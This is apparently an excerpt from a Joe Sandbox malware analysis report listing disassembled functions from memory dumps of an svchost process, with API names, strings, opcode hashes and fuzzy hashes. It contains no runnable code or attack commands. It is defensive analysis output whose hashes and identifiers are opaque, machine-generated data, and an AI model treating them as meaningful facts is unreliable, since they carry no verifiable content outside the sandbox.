                                                                  • Snapshot File: hcaresult_71_3_2a6612d0000_svchost.jbxd
                                                                  Similarity
                                                                  • API ID: _set_statfp
                                                                  • String ID:
                                                                  • API String ID: 1156100317-0
                                                                  • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                  • Instruction ID: f5a4be69ff799a498af4848c229d1a1df72a336720d2402a37a3c31005aff2c0
                                                                  • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                  • Instruction Fuzzy Hash: 3F11A332F14AC043FA589578E45E3A9148C7B57B75F4D0635AA66472FACF2C8BCC8106
                                                                  Function 000002A6612DA5A8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000047.00000003.1780006679.000002A6612D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A6612D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_71_3_2a6612d0000_svchost.jbxd
                                                                  Similarity
                                                                  • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                  • String ID: csm$csm
                                                                  • API String ID: 3896166516-3733052814
                                                                  • Opcode ID: 92a9139125581d210e17e0e512ec335e12b84a8ad252812ef56c38af1cf641ca
                                                                  • Instruction ID: 9cbffc8ec5ff8bdd9c127497ebb7c631b0c93787ca9db867f2f84a2ddb5c21bb
                                                                  • Opcode Fuzzy Hash: 92a9139125581d210e17e0e512ec335e12b84a8ad252812ef56c38af1cf641ca
                                                                  • Instruction Fuzzy Hash: AC514D32E00280CBEB688B21D44C75C77ACEB96F94F199115EA5A47BE5CF3CD4998B42
                                                                  Function 000002A661302604 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 185COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000047.00000002.2940302898.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                                  • Associated: 00000047.00000002.2940213578.000002A661300000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000047.00000002.2940434300.000002A661316000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000047.00000002.2940531148.000002A661321000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000047.00000002.2940671747.000002A661323000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000047.00000002.2940751974.000002A661329000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_71_2_2a661300000_svchost.jbxd
                                                                  Similarity
                                                                  • API ID: FileType
                                                                  • String ID: \\.\pipe\
                                                                  • API String ID: 3081899298-91387939
                                                                  • Opcode ID: 33e1af66e0871330679004fe562d697de0fc8c89851f4c88526204be402beab6
                                                                  • Instruction ID: e3bc9fb8a1330983b664812a075b31833c319c5b03025340e8eb6bef3a7db098
                                                                  • Opcode Fuzzy Hash: 33e1af66e0871330679004fe562d697de0fc8c89851f4c88526204be402beab6
                                                                  • Instruction Fuzzy Hash: FB71A436B0078147EB64DE36995C3AA67D8F786F85F590016ED0B63B99DF38C608C781
                                                                  Function 000002A6612DA24C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 147COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000047.00000003.1780006679.000002A6612D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A6612D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_71_3_2a6612d0000_svchost.jbxd
                                                                  Similarity
                                                                  • API ID: CallTranslator
                                                                  • String ID: MOC$RCC
                                                                  • API String ID: 3163161869-2084237596
                                                                  • Opcode ID: 30a9d0c0d3f57c599bda06983a5ca6919b98e12de895e70124a407b05a736fc2
                                                                  • Instruction ID: 43e1584eca2d796283e50f3f8a8e87af42aa333ef39e15b5d83a4208803e4e45
                                                                  • Opcode Fuzzy Hash: 30a9d0c0d3f57c599bda06983a5ca6919b98e12de895e70124a407b05a736fc2
                                                                  • Instruction Fuzzy Hash: 4C617932E04B848BEB60CF65D04879D77A9FB46B88F184215EF4913BA9DF78C498C702
                                                                  Function 000002A6612E2DDB Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 140COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000047.00000003.1780006679.000002A6612D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A6612D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_71_3_2a6612d0000_svchost.jbxd
                                                                  Similarity
                                                                  • API ID: _log10_special
                                                                  • String ID: dll
                                                                  • API String ID: 3812965864-1037284150
                                                                  • Opcode ID: f5c871aa60dc0e0ec45b8b1933c36a9d422e8a67736998cb73b4f17a378e9579
                                                                  • Instruction ID: 7c2625f02462df714b302d873d198b90f073f5d4d3204461980f9b2b93d85b0e
                                                                  • Opcode Fuzzy Hash: f5c871aa60dc0e0ec45b8b1933c36a9d422e8a67736998cb73b4f17a378e9579
                                                                  • Instruction Fuzzy Hash: AB614221E25FCA8ED5639B39A46D265571CBF53BC5F49D307E80A33A71EF1C928B8201
                                                                  Function 000002A661312B20 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000047.00000002.2940302898.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                                  • Associated: 00000047.00000002.2940213578.000002A661300000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000047.00000002.2940434300.000002A661316000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000047.00000002.2940531148.000002A661321000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000047.00000002.2940671747.000002A661323000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000047.00000002.2940751974.000002A661329000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_71_2_2a661300000_svchost.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorFileLastWrite
                                                                  • String ID: U
                                                                  • API String ID: 442123175-4171548499
                                                                  • Opcode ID: 08a3ddd2b86f7b8515106781585b8c8a1d40bea7a265024b77d0f248b7dc9f58
                                                                  • Instruction ID: 00729653e197ad33754e76cd4d703fb91cc2a543f0faa093d2894e13b45c3028
                                                                  • Opcode Fuzzy Hash: 08a3ddd2b86f7b8515106781585b8c8a1d40bea7a265024b77d0f248b7dc9f58
                                                                  • Instruction Fuzzy Hash: B741F572B14A8087DB20DF65E44D3AA77A4F39AB84F984021EE4E97798EF7CC449C741
                                                                  Function 000002A6612D7786 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 18COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000047.00000003.1780006679.000002A6612D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A6612D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_71_3_2a6612d0000_svchost.jbxd
                                                                  Similarity
                                                                  • API ID: __std_exception_copy
                                                                  • String ID: `vector constructor iterator'$ctor closure'
                                                                  • API String ID: 592178966-3792692944
                                                                  • Opcode ID: 3d94f62f39723b7dc1272b79e31019e2f4db169682176d2f048e7421b3153389
                                                                  • Instruction ID: 113830a2bc3ebd6b24b96ba9216da5ed91371c25bace9118cfc115a3cc460421
                                                                  • Opcode Fuzzy Hash: 3d94f62f39723b7dc1272b79e31019e2f4db169682176d2f048e7421b3153389
                                                                  • Instruction Fuzzy Hash: 6FE04F61B51B84D1DF018F22E4882D833A8DB6AB54B4C9122995C07311EB3CD2EDC341
                                                                  Function 000002A6612D77E4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000047.00000003.1780006679.000002A6612D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A6612D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_71_3_2a6612d0000_svchost.jbxd
                                                                  Similarity
                                                                  • API ID: __std_exception_copy
                                                                  • String ID: ctor closure'$destructor iterator'
                                                                  • API String ID: 592178966-595914035
                                                                  • Opcode ID: 178c451bf754e9b3f91433b5168c8e4fc02ede9add1333831d18f9cb102bf374
                                                                  • Instruction ID: b2701e076f2f8afd4d212f12c153584a0888d6f8d6490ee9c89ab05963efd12b
                                                                  • Opcode Fuzzy Hash: 178c451bf754e9b3f91433b5168c8e4fc02ede9add1333831d18f9cb102bf374
                                                                  • Instruction Fuzzy Hash: 6EE04F61B11B44C1DB018F21D4841982368EB6AB54B889122C95C07311EB3CD2E9C341
                                                                  Function 000002A6612D78EC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 11COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000047.00000003.1780006679.000002A6612D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A6612D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_71_3_2a6612d0000_svchost.jbxd
                                                                  Similarity
                                                                  • API ID: std::bad_alloc::bad_alloc
                                                                  • String ID: `scalar deleting destructor'$rFeaturePresent
                                                                  • API String ID: 1875163511-1689945142
                                                                  • Opcode ID: 825dc38fabb3a4a7c87f2f3a88ae4ed20e2ecae66053889663208d07eaa1d642
                                                                  • Instruction ID: 1193f4b65bef69c4a09b888f9edf9af35d4c32735edb9b12914e6b4bdc1b4090
                                                                  • Opcode Fuzzy Hash: 825dc38fabb3a4a7c87f2f3a88ae4ed20e2ecae66053889663208d07eaa1d642
                                                                  • Instruction Fuzzy Hash: 7AD06722B21A8496EE10EB14D88D389633CF795B08F985415D14D82975EF2CCA8ED751